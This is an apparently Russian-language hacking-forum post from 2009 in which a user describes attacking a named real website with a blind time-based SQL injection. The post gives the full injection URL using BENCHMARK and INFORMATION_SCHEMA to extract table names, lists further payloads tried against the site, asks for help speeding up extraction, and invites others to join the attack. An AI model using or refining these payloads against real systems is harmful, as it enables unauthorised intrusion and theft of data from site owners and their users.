
08.08.2009, 14:52
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
С нами:
9505375
Репутация:
19
|
|
Есть слепая скуля без выводимых полей
http://mirsauni.ru/?cid=4+OR+id=IF(ascii(substring((select+TABLE_NAME +from+INFORMATION_SCHEMA.TABLES+LIMIT+17,1),1,1))> 0,889999999999,BENCHMARK(9999999,MD5(NOW())))--
Все ок,работает.Не понятно только почему cid=4+OR+ id=IF (нашел опытным путем) ,а не cid=4+OR+ сid=IF (так не работет). Ну да ладно...
Хотелось бы избавится от BENCHMARK'a, т. к. с ним выуживать таблы я 100 лет буду.Вар-ты типа
IF(ASCII(SUBSTRING((SELECT VERSION()),1,1) =5,'1','0')
find_in_set(substring((SELECT VERSION()),1,1),'0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f')
не катят, думаю что из-за кавычек в запросах. Кодирую кавычку в HEX - все равно 0 рез-тат.
Задача осложяется тем, что к примеру на 2 идентичные запроса ?cid=4 из БД будет вытащена разная инфа (какой-нить RANDOM() стоит).
Кто хочет поковырять, велком 10115695. У меня уже мозг кипит.
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|